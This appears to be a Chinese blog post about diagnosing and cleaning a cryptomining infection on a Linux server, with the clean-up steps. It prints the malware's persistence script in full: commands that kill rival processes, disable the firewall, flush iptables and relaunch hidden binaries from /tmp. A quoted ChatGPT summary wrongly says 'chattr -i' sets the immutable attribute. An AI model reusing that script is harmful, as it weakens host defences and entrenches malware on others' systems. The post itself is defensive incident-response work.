服务器病毒排查与处理

已于 2024-01-31 16:33:15 修改
阅读量1.3k 收藏 11
点赞数 13
文章标签: 服务器 安全
于 2024-01-31 16:23:58 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45669210/article/details/135956445
版权

病毒排查

起因

htop命令发现32个线程被完全占用,但是没有显示相应的进程,怀疑是中病毒了。

分析

unhide proc命令查看隐藏进程,得到:

Found HIDDEN PID: 3010499
        Cmdline: "<none>"
        Executable: "<no link>"
        "<none>  ... maybe a transitory process"

Found HIDDEN PID: 3010501
        Cmdline: "/tmp/netools"
        Executable: "/tmp/netools"
        Command: "netools"
        $USER=<undefined>
        $PWD=/root

Found HIDDEN PID: 3010502
        Cmdline: "/tmp/netools"
        Executable: "/tmp/netools"
        Command: "netools"
        $USER=<undefined>
        $PWD=/root

Found HIDDEN PID: 3010503
        Cmdline: "/tmp/netools"
        Executable: "/tmp/netools"
        Command: "netools"
        $USER=<undefined>
        $PWD=/root

Found HIDDEN PID: 3010504
        Cmdline: "/tmp/netools"
        Executable: "/tmp/netools"
        Command: "netools"
        $USER=<undefined>
        $PWD=/root

Found HIDDEN PID: 3010505
        Cmdline: "/tmp/netools"
        Executable: "/tmp/netools"
        Command: "netools"
        $USER=<undefined>
        $PWD=/root

Found HIDDEN PID: 3010635
        Cmdline: "/tmp/netools"
        Executable: "/tmp/netools"
        Command: "netools"
        $USER=<undefined>
        $PWD=/root

Found HIDDEN PID: 3010636
        Cmdline: "/tmp/netools"
        Executable: "/tmp/netools"
        Command: "netools"
        $USER=<undefined>
        $PWD=/root

Found HIDDEN PID: 3010637
        Cmdline: "/tmp/netools"
        Executable: "/tmp/netools"
        Command: "netools"
        $USER=<undefined>
        $PWD=/root

Found HIDDEN PID: 3010638
        Cmdline: "/tmp/netools"
        Executable: "/tmp/netools"
        Command: "netools"
        $USER=<undefined>
        $PWD=/root

Found HIDDEN PID: 3010639
        Cmdline: "/tmp/netools"
        Executable: "/tmp/netools"
        Command: "netools"
        $USER=<undefined>
        $PWD=/root

Found HIDDEN PID: 3010640
        Cmdline: "/tmp/netools"
        Executable: "/tmp/netools"
        Command: "netools"
        $USER=<undefined>
        $PWD=/root

Found HIDDEN PID: 3010641
        Cmdline: "/tmp/netools"
        Executable: "/tmp/netools"
        Command: "netools"
        $USER=<undefined>
        $PWD=/root

Found HIDDEN PID: 3010642
        Cmdline: "/tmp/netools"
        Executable: "/tmp/netools"
        Command: "netools"
        $USER=<undefined>
        $PWD=/root

Found HIDDEN PID: 3010643
        Cmdline: "/tmp/netools"
        Executable: "/tmp/netools"
        Command: "netools"
        $USER=<undefined>
        $PWD=/root

Found HIDDEN PID: 3010644
        Cmdline: "/tmp/netools"
        Executable: "/tmp/netools"
        Command: "netools"
        $USER=<undefined>
        $PWD=/root

Found HIDDEN PID: 3010645
        Cmdline: "/tmp/netools"
        Executable: "/tmp/netools"
        Command: "netools"
        $USER=<undefined>
        $PWD=/root

Found HIDDEN PID: 3010646
        Cmdline: "/tmp/netools"
        Executable: "/tmp/netools"
        Command: "netools"
        $USER=<undefined>
        $PWD=/root

Found HIDDEN PID: 3010647
        Cmdline: "/tmp/netools"
        Executable: "/tmp/netools"
        Command: "netools"
        $USER=<undefined>
        $PWD=/root

Found HIDDEN PID: 3010648
        Cmdline: "/tmp/netools"
        Executable: "/tmp/netools"
        Command: "netools"
        $USER=<undefined>
        $PWD=/root

Found HIDDEN PID: 3010649
        Cmdline: "/tmp/netools"
        Executable: "/tmp/netools"
        Command: "netools"
        $USER=<undefined>
        $PWD=/root

Found HIDDEN PID: 3010650
        Cmdline: "/tmp/netools"
        Executable: "/tmp/netools"
        Command: "netools"
        $USER=<undefined>
        $PWD=/root

Found HIDDEN PID: 3010651
        Cmdline: "/tmp/netools"
        Executable: "/tmp/netools"
        Command: "netools"
        $USER=<undefined>
        $PWD=/root

Found HIDDEN PID: 3010652
        Cmdline: "/tmp/netools"
        Executable: "/tmp/netools"
        Command: "netools"
        $USER=<undefined>
        $PWD=/root

Found HIDDEN PID: 3010653
        Cmdline: "/tmp/netools"
        Executable: "/tmp/netools"
        Command: "netools"
        $USER=<undefined>
        $PWD=/root

Found HIDDEN PID: 3010654
        Cmdline: "/tmp/netools"
        Executable: "/tmp/netools"
        Command: "netools"
        $USER=<undefined>
        $PWD=/root

Found HIDDEN PID: 3010655
        Cmdline: "/tmp/netools"
        Executable: "/tmp/netools"
        Command: "netools"
        $USER=<undefined>
        $PWD=/root

Found HIDDEN PID: 3010656
        Cmdline: "/tmp/netools"
        Executable: "/tmp/netools"
        Command: "netools"
        $USER=<undefined>
        $PWD=/root

Found HIDDEN PID: 3010657
        Cmdline: "/tmp/netools"
        Executable: "/tmp/netools"
        Command: "netools"
        $USER=<undefined>
        $PWD=/root

Found HIDDEN PID: 3010658
        Cmdline: "/tmp/netools"
        Executable: "/tmp/netools"
        Command: "netools"
        $USER=<undefined>
        $PWD=/root

Found HIDDEN PID: 3010659
        Cmdline: "/tmp/netools"
        Executable: "/tmp/netools"
        Command: "netools"
        $USER=<undefined>
        $PWD=/root

Found HIDDEN PID: 3010660
        Cmdline: "/tmp/netools"
        Executable: "/tmp/netools"
        Command: "netools"
        $USER=<undefined>
        $PWD=/root

Found HIDDEN PID: 3010661
        Cmdline: "/tmp/netools"
        Executable: "/tmp/netools"
        Command: "netools"
        $USER=<undefined>
        $PWD=/root

Found HIDDEN PID: 3010662
        Cmdline: "/tmp/netools"
        Executable: "/tmp/netools"
        Command: "netools"
        $USER=<undefined>
        $PWD=/root

Found HIDDEN PID: 3010663
        Cmdline: "/tmp/netools"
        Executable: "/tmp/netools"
        Command: "netools"
        $USER=<undefined>
        $PWD=/root

Found HIDDEN PID: 3010664
        Cmdline: "/tmp/netools"
        Executable: "/tmp/netools"
        Command: "netools"
        $USER=<undefined>
        $PWD=/root

Found HIDDEN PID: 3010665
        Cmdline: "/tmp/netools"
        Executable: "/tmp/netools"
        Command: "netools"
        $USER=<undefined>
        $PWD=/root

Found HIDDEN PID: 3010666
        Cmdline: "/tmp/netools"
        Executable: "/tmp/netools"
        Command: "netools"
        $USER=<undefined>
        $PWD=/root

Found HIDDEN PID: 3010667
        Cmdline: "/tmp/netools"
        Executable: "/tmp/netools"
        Command: "netools"
        $USER=<undefined>
        $PWD=/root

Found HIDDEN PID: 3010668
        Cmdline: "/tmp/netools"
        Executable: "/tmp/netools"
        Command: "netools"
        $USER=<undefined>
        $PWD=/root

Found HIDDEN PID: 3010669
        Cmdline: "/tmp/netools"
        Executable: "/tmp/netools"
        Command: "netools"
        $USER=<undefined>
        $PWD=/root

Found HIDDEN PID: 3010670
        Cmdline: "/tmp/netools"
        Executable: "/tmp/netools"
        Command: "netools"
        $USER=<undefined>
        $PWD=/root

Found HIDDEN PID: 3010671
        Cmdline: "/tmp/netools"
        Executable: "/tmp/netools"
        Command: "netools"
        $USER=<undefined>
        $PWD=/root

Found HIDDEN PID: 3010672
        Cmdline: "/tmp/netools"
        Executable: "/tmp/netools"
        Command: "netools"
        $USER=<undefined>
        $PWD=/root

Found HIDDEN PID: 3010673
        Cmdline: "/tmp/netools"
        Executable: "/tmp/netools"
        Command: "netools"
        $USER=<undefined>
        $PWD=/root

Found HIDDEN PID: 3010674
        Cmdline: "/tmp/netools"
        Executable: "/tmp/netools"
        Command: "netools"
        $USER=<undefined>
        $PWD=/root

Found HIDDEN PID: 3010675
        Cmdline: "/tmp/netools"
        Executable: "/tmp/netools"
        Command: "netools"
        $USER=<undefined>
        $PWD=/root

Found HIDDEN PID: 3010676
        Cmdline: "/tmp/netools"
        Executable: "/tmp/netools"
        Command: "netools"
        $USER=<undefined>
        $PWD=/root

Found HIDDEN PID: 3010677
        Cmdline: "/tmp/netools"
        Executable: "/tmp/netools"
        Command: "netools"
        $USER=<undefined>
        $PWD=/root

Found HIDDEN PID: 3010678
        Cmdline: "/tmp/netools"
        Executable: "/tmp/netools"
        Command: "netools"
        $USER=<undefined>
        $PWD=/root

Found HIDDEN PID: 3010679
        Cmdline: "/tmp/netools"
        Executable: "/tmp/netools"
        Command: "netools"
        $USER=<undefined>
        $PWD=/root

Found HIDDEN PID: 3010680
        Cmdline: "/tmp/netools"
        Executable: "/tmp/netools"
        Command: "netools"
        $USER=<undefined>
        $PWD=/root

Found HIDDEN PID: 3010681
        Cmdline: "/tmp/netools"
        Executable: "/tmp/netools"
        Command: "netools"
        $USER=<undefined>
        $PWD=/root

Found HIDDEN PID: 3010682
        Cmdline: "/tmp/netools"
        Executable: "/tmp/netools"
        Command: "netools"
        $USER=<undefined>
        $PWD=/root

Found HIDDEN PID: 3010683
        Cmdline: "/tmp/netools"
        Executable: "/tmp/netools"
        Command: "netools"
        $USER=<undefined>
        $PWD=/root

Found HIDDEN PID: 3010684
        Cmdline: "/tmp/netools"
        Executable: "/tmp/netools"
        Command: "netools"
        $USER=<undefined>
        $PWD=/root

Found HIDDEN PID: 3010685
        Cmdline: "/tmp/netools"
        Executable: "/tmp/netools"
        Command: "netools"
        $USER=<undefined>
        $PWD=/root

Found HIDDEN PID: 3010686
        Cmdline: "/tmp/netools"
        Executable: "/tmp/netools"
        Command: "netools"
        $USER=<undefined>
        $PWD=/root

Found HIDDEN PID: 3010687
        Cmdline: "/tmp/netools"
        Executable: "/tmp/netools"
        Command: "netools"
        $USER=<undefined>
        $PWD=/root

Found HIDDEN PID: 3010688
        Cmdline: "/tmp/netools"
        Executable: "/tmp/netools"
        Command: "netools"
        $USER=<undefined>
        $PWD=/root

Found HIDDEN PID: 3010689
        Cmdline: "/tmp/netools"
        Executable: "/tmp/netools"
        Command: "netools"
        $USER=<undefined>
        $PWD=/root

Found HIDDEN PID: 3010690
        Cmdline: "/tmp/netools"
        Executable: "/tmp/netools"
        Command: "netools"
        $USER=<undefined>
        $PWD=/root

Found HIDDEN PID: 3010691
        Cmdline: "/tmp/netools"
        Executable: "/tmp/netools"
        Command: "netools"
        $USER=<undefined>
        $PWD=/root

Found HIDDEN PID: 3010692
        Cmdline: "/tmp/netools"
        Executable: "/tmp/netools"
        Command: "netools"
        $USER=<undefined>
        $PWD=/root

Found HIDDEN PID: 3010693
        Cmdline: "/tmp/netools"
        Executable: "/tmp/netools"
        Command: "netools"
        $USER=<undefined>
        $PWD=/root

Found HIDDEN PID: 3010694
        Cmdline: "/tmp/netools"
        Executable: "/tmp/netools"
        Command: "netools"
        $USER=<undefined>
        $PWD=/root

Found HIDDEN PID: 3010695
        Cmdline: "/tmp/netools"
        Executable: "/tmp/netools"
        Command: "netools"
        $USER=<undefined>
        $PWD=/root

Found HIDDEN PID: 3010696
        Cmdline: "/tmp/netools"
        Executable: "/tmp/netools"
        Command: "netools"
        $USER=<undefined>
        $PWD=/root

Found HIDDEN PID: 3010697
        Cmdline: "/tmp/netools"
        Executable: "/tmp/netools"
        Command: "netools"
        $USER=<undefined>
        $PWD=/root

Found HIDDEN PID: 3010698
        Cmdline: "/tmp/netools"
        Executable: "/tmp/netools"
        Command: "netools"
        $USER=<undefined>
        $PWD=/root

尝试把进程kill掉,但是很快CPU又被侵占了。确认就是病毒。

然后用ps命令想再查看一次进程时:

ps aux --sort=-pcpu  | head -10

发现

root     3024733  0.2  0.0  12580  3288 ?        S    10:30   0:00 /bin/lRrlrT3D -c                                 #!/bin/bash crontab -r >/dev/null 2>&1 ps aux | grep -vw 'xmr-stak\|ld-linux.so.2' | (test -e /bin/.locked && grep -vwf /bin/.locked) | awk '{if($3>40.0) print $2}' | while read procid; do kill -9 $procid; done 2>/dev/null  ufw disable >/dev/null 2>&1 iptables -P INPUT ACCEPT 2>/dev/null iptables -P OUTPUT ACCEPT 2>/dev/null iptables -P FORWARD ACCEPT 2>/dev/null iptables -F 2>/dev/null chattr -i /usr/sbin/ >/dev/null 2>&1 chattr -i /usr/bin/ >/dev/null 2>&1 chattr -i /bin/ >/dev/null 2>&1 chattr -i /usr/lib >/dev/null 2>&1 chattr -i /usr/lib64 >/dev/null 2>&1 chattr -i /usr/libexec >/dev/null 2>&1 chattr -i /etc/ >/dev/null 2>&1 chattr -i /tmp/ >/dev/null 2>&1 chattr -i /sbin/ >/dev/null 2>&1 chattr -i /etc/resolv.conf >/dev/null 2>&1 chattr -i /etc/cron.d/systeml >/dev/null 2>&1 chattr -i /etc/cron.weekly/systeml >/dev/null 2>&1 chattr -i /etc/cron.hourly/systeml >/dev/null 2>&1 chattr -i /etc/cron.daily/systeml >/dev/null 2>&1 chattr -i /etc/cron.monthly/systeml >/dev/null 2>&1  chattr -ia /etc/ld.so.preload 2>/dev/null cat /dev/null > /etc/ld.so.preload 2>/dev/null  # Check if a file exists containing the previous filenames if [ -e "/usr/lib/systemd/previous_filenames1" ] && [ -e "/usr/lib/systemd/previous_filenames2" ]; then     # Read the previous filenames from the files     read -r file1 < "/usr/lib/systemd/previous_filenames1"     read -r file2 < "/usr/lib/systemd/previous_filenames2" else     # Generate new random filenames     file1="/bin/$(cat /dev/urandom | tr -dc 'a-zA-Z0-9' | fold -w 8 | head -n 1)"     file2="/bin/$(cat /dev/urandom | tr -dc 'a-zA-Z0-9' | fold -w 8 | head -n 1)"      # Save the filenames to files for the next run     echo "$file1" > "/usr/lib/systemd/previous_filenames1"     echo "$file2" > "/usr/lib/systemd/previous_filenames2" fi # Move the files to their new names mv x86_64 "$file1" 2>/dev/null mv i386 "$file2" 2>/dev/null  BACK="$file1" SERVICE="netools" NEO="$file2" EXEC="netools" DIR="/tmp" LOCK_FILE="/bin/.locked"  chattr -iaus /etc/cron.*/$COPY /etc/init.d/$COPY 2>/dev/null  if [ -e "/bin/.locked" ]; then     PID=$(cat /bin/.locked) else #    echo "Creating /bin/.locked"     touch /bin/.locked 2>/dev/null     truncate -s 0 /bin/.locked 2>/dev/null     PID=0  # Set an initial value, assuming 0 is not a valid process ID fi  # Check if the corresponding directory exists in /proc/ if [ -n "$PID" ] && [ "$PID" -ne 0 ] && ls -la "/proc/$PID" > /dev/null 2>&1; then     echo "Running" else     echo "Not running"     cp "$BACK" "$DIR/$EXEC" 2>/dev/null     cp "$NEO" "$DIR/neo" 2>/dev/null     chmod +x "$DIR/$EXEC" 2>/dev/null     chmod +x "$DIR/neo" 2>/dev/null      # Check if the process is not already running before starting it     if [ -z "$(pidof "$EXEC")" ]; then         "$DIR/$EXEC" --tls >/dev/null 2>&1         sleep 2         PID=$(pidof "$EXEC")     fi      truncate -s 0 /bin/.locked     echo "$PID" > /bin/.locked 2>/dev/null fi sleep 5 "$DIR/neo" "$PID" >/dev/null 2>&1 sleep 2 pkill -f fold pkill -f cat pkill -f tr  /bin/lRrlrT3D 1 1

初步断定这个可执行文件就是罪魁祸首,用ChatGPT分析得到这个脚本的作用:

  1. 找到并终止当前系统中CPU占用率超过40%的进程

  2. 调整系统的网络设置,其中包括禁用 ufw 防火墙,以及将 iptables 默认策略设置为允许所有的输入、输出和转发。

  3. 设置 /usr/sbin/ 目录的 “immutable” 属性,使得该目录不可以被修改或删除。还有其他的一些文件夹。

  4. 检查 /usr/lib/systemd/previous_filenames1 /usr/lib/systemd/previous_filenames2 这两个文件是否存在。如果文件存在,则读取里面的内容(是文件名)

  5. 如果文件不存在,那么生成两个新的随机文件名,并将其赋值给变量 file1 和 file2(file1="/bin/$(cat /dev/urandom | tr -dc 'a-zA-Z0-9' | fold -w 8 | head -n 1)。将生成的新文件名保存到两个previous_filenames1和2中,以便下次运行时使用。

  6. 将文件 x86_64 重命名为 file1,i386 重命名为 file2。(这个好像不重要)

  7. 设置一些变量,包括备份文件名、服务名、新文件名等。

 BACK="$file1"
 SERVICE="netools"
 NEO="$file2"
 EXEC="netools"
 DIR="/tmp"
 LOCK_FILE="/bin/.locked"
  1. chattr -iaus /etc/cron.*/$COPY /etc/init.d/$COPY 2>/dev/null 取消文件属性。
  2. 检查锁定文件和进程状态:检查是否存在/bin/.locked,如果存在,读取其中的PID。如果不存在锁定文件,创建并设置PID为0:
  3. 检查进程是否正在运行:检查指定PID的进程是否存在。
  4. 如果进程不在运行中,则复制文件、修改权限并启动进程:
cp "$BACK" "$DIR/$EXEC" 2>/dev/null
cp "$NEO" "$DIR/neo" 2>/dev/null
chmod +x "$DIR/$EXEC" 2>/dev/null
chmod +x "$DIR/neo" 2>/dev/null

if [ -z "$(pidof "$EXEC")" ]; then
    "$DIR/$EXEC" --tls >/dev/null 2>&1
    sleep 2
    PID=$(pidof "$EXEC")
fi

truncate -s 0 /bin/.locked
echo "$PID" > /bin/.locked 2>/dev/null
  1. 等待5秒,然后终止特定的进程:
sleep 5 "$DIR/neo" "$PID" >/dev/null 2>&1
sleep 2
pkill -f fold pkill -f cat pkill -f tr /bin/lRrlrT3D 1 1

总的来说,就是用/bin/lRrlrT3D这个可执行文件调用一个脚本,这个脚本把 x86_64 和 i386 可执行文件重命名并运行了,可能是为了lRrlrT3D这个可执行文件后续做什么,这个就不知道了。

处理

首先,先关闭定时启动

vim /etc/crontab

# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# Example of job definition:
# .---------------- minute (0 - 59)
# |  .------------- hour (0 - 23)
# |  |  .---------- day of month (1 - 31)
# |  |  |  .------- month (1 - 12) OR jan,feb,mar,apr ...
# |  |  |  |  .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat
# |  |  |  |  |
# *  *  *  *  * user-name command to be executed
17 *  * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6  * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6  * * 7   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6  1 * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
 
注释掉:
# 17 *  * * *   root    cd / && run-parts --report /etc/cron.hourly
# 25 6  * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
# 47 6  * * 7   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
# 52 6  1 * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )

其次,删除可执行文件。

  1. /etc/cron.hourly文件夹中的可执行文件,是一串英文的文件:
cat /etc/cron.hourly/nek3MFYw

# */1 * * * * root /bin/lRrlrT3D 1 1

同样还有/etc/cron.hourly/etc/cron.daily/etc/cron.weekly/etc/cron.monthly

  1. 删除/bin/lRrlrT3D

  2. 查看previous_filenames1previous_filenames2中的内容(假如是XXX),删除/bin/XXX/tmp/XXX/tmp/neo

最后reboot

注意

在这中间发现没办法开启终端访问服务器,后面发现是因为删除了/dev文件夹中的很多文件(应该是病毒删除的),reboot就恢复了。

Woo!
关注
  • 13
    点赞
  • 11
    收藏
    觉得还不错? 一键收藏
  • 6
    评论
解决linux中挖矿病毒
chen_jianjian的专栏
07-13 8123
服务器服务不响应 有同事反应gitlab无法使用,登录服务器后台,发现有个进程占用CPU很高,进程名异常 获取病毒绝对路径 [root@localhost ~]# cat /proc/17521/cmdline wswfEOH6[root@localhost ~]# ls -l /proc/17521/exe lrwxrwxrwx. 1 root root 0 7月 13 10:03 /proc/17521/exe -> /root/b5e9c4b2a988579aa182c393.
这个netools占cpu特别多,kill关掉之后过一会又重新自起了,也试过sudo systemctl stop netools 禁止自启 提示提示failed to execute operat
weixin_60504005的博客
01-22 1065
记一次 LINUX 挖矿病毒 networkservice 分析 原因通过redis入侵
球球的博客
12-06 2155
单位ip被电信拉黑,原因恶意访问非法目的地; 通过安全防护软件分析一台服务器不断向国外不同国家发包请求;定位到服务器 192.168.2.110 登陆服务器一看cpu 爆满; 看是服务networkservice;不知所以然;百度一下 发现有同学已经中招了 定位是 挖矿病毒 networkservice; 清除的过程 使用top已经知道了进程号,接下来看看位置,命令ls -l pro...
netools源代码
06-17
不用多说了,ifconfig,netstat等命令的源代码。很好的学习资料。
记录linux挖矿清除步骤
itoof.com专栏
08-28 849
linux服务器删除 git 导致挖矿程序
linux Net-tools命令使用和输出信息分析
DDQ337的博客
01-03 4560
首先安装 net - tools ,yum insatll net-tools netstat命令格式如下: 默认情况下,netstat显示打开的套接字列表。如果不指定任何地址族,则将打印所有已配置地址家族的活动套接字。 netstat [参数] 参数: -a (all)   显示所有连接中的socket信息。 -t (tcp)   仅显示tcp相关选项。 -u (udp)   仅显示udp相关选项。 -n      直接使用ip地址,而不通过域名显示。 -l      仅列出有在 Listen (..
ubuntu18.04安装net-tools
liji_digital的博客
05-22 1万+
我的ubuntu18.04虚拟机上默认是没有ifconfig指令的。当然,我可以用apt安装,但是这样可能会把一系列依赖包也带进我的环境,让我不知道到底自己对环境做了多少改动。所以我打算用源码编译。另外一个想编译的原因是,我想学习一下别人的源码,而ifconfig又是一个常用的指令,并且代码量相对较小,学习曲线不是那么陡峭。 目录 下载net-tools 编译 效果 下载net-tools ifconfig是net-tools软件的一部分。首先到souceforge网站下载net-tools
服务器故障处理预案.doc
06-29
2. **初步分析与诊断**:信息中心依据故障的症状,参照《服务器故障处理预案》中的第二部分,进行初步分析和诊断,判断故障的性质和类型。 3. **分类处理**: - **硬件故障**:通过硬件诊断工具确认故障部件。若...
服务器故障处理预案.pdf
11-05
第三部分涉及服务器软件故障的诊断和处理,虽然具体内容未给出,但通常会涵盖操作系统、网络控制和管理系统的恢复策略,以及数据库、应用服务的故障排查和修复方法。 总之,这份预案提供了一个系统性的服务器故障...
服务器故障处理预案范本模板.pdf
11-05
1. **服务器故障定义**:服务器故障涵盖各种可能的原因,如设备质量问题、人为操作失误、外部环境因素,以及病毒和黑客攻击。故障设备包括小型机和PC服务器,具体设备清单需参照附表。 2. **故障分类**: - **...
服务器日常维护制度.doc
06-29
#### 四、服务器病毒防范制度 1. **病毒检测与防护**: - 网络管理人员应定期进行病毒检测,并采取相应的清除措施。 - 新软件安装前必须进行病毒扫描。 - 远程通信传输的程序或数据也需经过病毒检测。 2. **...
服务器应急预案.docx
06-29
- 检查操作系统进程、文件完整性,排查病毒、木马程序和黑客攻击。 - 如果仅是业务系统出现问题,则重点检查代码和数据是否受损,并从正确备份中恢复缺失部分。 #### 三、服务器硬件故障应对预案 1. **报告与...
每天5分钟玩转Linux系列-CentOS7x64 1810安装net-tools工具
架构师亮哥的博客
06-16 816
每天5分钟玩转Linux系列-CentOS7x64 1810安装net-tools工具 我们最小化安装的Linux经常会遇到没有ping命令等网络基础工具包,那么如何解决呢? yum install -y net-tools 安装完毕以后百度 可以Ping 获得更多Linux知识 Linux运维技术交流群:QQ:833196402 Python技术交流群:QQ:971440453 大数据运维技术交流群:QQ:766173537 ...
Nettools命令使用和输出信息分析
CMG31334144的博客
01-09 3769
一.安装 net - tools : 1.包含netstat的软件包称为net-tools 。 在现代系统上, netstat实用程序已预先安装,因此无需安装。 但是,在较旧的系统上,运行netstat命令可能会遇到错误。 因此,要在Linux发行版上安装netstat ,请运行命令。 # yum install net-tools [On CentOS/RHEL] # apt install net-tools [On Debian/Ubuntu] # zypper install n
net-tools工具箱
热门推荐
hhhhhyyyyy8的博客
11-20 2万+
虽说net-tools工具箱要被iproute2取代,但是连net-tools工具都不会,也说不过去吧。 net-tools工具箱包括arp, hostname, ifconfig, netstat, rarp, route, plipconfig, slattach, mii-tool and iptunnel and ipmaddr等命令。 参考: https://www.cnblogs...
Linux中的临时文件夹/tmp
m0_61629312的博客
04-23 1340
是一个临时文件夹,用于存储临时文件和临时数据。这个目录通常在系统启动时创建,并在每次重新启动后被清空,因此里面的文件不会永久保存,而是在不再需要时被删除。文件夹是Linux系统中用于存放临时文件和临时数据的目录,具有临时性和易清理的特点,适合存放程序运行时产生的临时数据和文件。2024年4月23日,周二下午。在Linux系统中,
关于Linux系统清理/tmp/文件夹
资源备忘
12-25 2722
我们知道,在Linux系统中/tmp文件夹里面的文件会被清空,至于多长时间被清空,如何清空的,可能大家知识的就不多了,所以,今天我们就来剖析一个这两个问题。 在RHEL\CentOS\Fedora\系统中(本次实验是在RHEL6中进行的) 先来看看tmpwatch这个命令,他的作用就是删除一段时间内不使用的文件(removes files which haven’t been accessed
一次Linux中的木马病毒解决经历
欢迎来到我的博客
12-29 1696
病毒入侵解决方案 情景 最近几天一直CPU100%,也没有注意看到了以为正常的服务调用,直到腾讯给发了邮件警告说我的服务器正在入侵其他服务器的6379端口,我就是正常的使用不可能去入侵别人的系统的,这是违法的. 排查 既然入侵6379端口,就怀疑是通过我的Redis服务进入的我的系统,因为我的Redis服务是在公网可以访问的,于是关闭了Redis服务的远程访问,重启服务器,之后就正常了,但是过了有半个小时发现CPU又100%了. 这个时候就说明木马已经入侵了,不是即时入侵的. ...
万字解析文件fd,深刻理解:fd文件描述符、位图、标准输入、标准输出、标准错误、文件打开、文件关闭、Linux一切皆文件理解、进程和文件的关系、虚拟软件系统
最新发布
qq_51216031的博客
08-08 691
什么是文件?打开文件是什么意思?怎么打开文件?关闭文件又是什么意思?怎么关闭文件?打开的文件怎么管理?关闭的文件又怎么管理?为什么要管理?如何管理?文件路径是什么意思?什么是位图?我们不能仅从语言角度去理解文件,还需要站在操作系统的角度去理解才能全面。所以,本文将会从操作系统的角度去深刻理解文件。同时,回答上述的若干问题。
linux 病毒排查
09-27
要判断Linux服务器是否被入侵,可以根据以下步骤进行排查: 1. 检查系统日志:查看/var/log目录下的日志文件,特别是auth.log或secure.log文件,寻找异常登录尝试、非法用户访问等可疑活动记录。 2. 检查网络连接:使用netstat命令查看当前的网络连接情况,寻找不明连接或大量连接到外部IP地址的异常情况。 3. 检查进程活动:使用ps命令查看当前运行的进程,注意查找不属于常见系统进程的可疑进程。 4. 检查文件系统:使用find命令或其他工具扫描系统文件,查找可疑文件、隐藏文件或异常权限设置的文件。 5. 检查计划任务:使用crontab命令查看计划任务列表,注意查找不明定时任务或异常命令。 6. 检查系统补丁:确保系统已安装最新的安全补丁,以修复已知的漏洞。 7. 使用安全扫描工具:可以使用一些专业的安全扫描工具,如rkhunter、chkrootkit等,对系统进行全面的扫描和分析。
评论 6
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值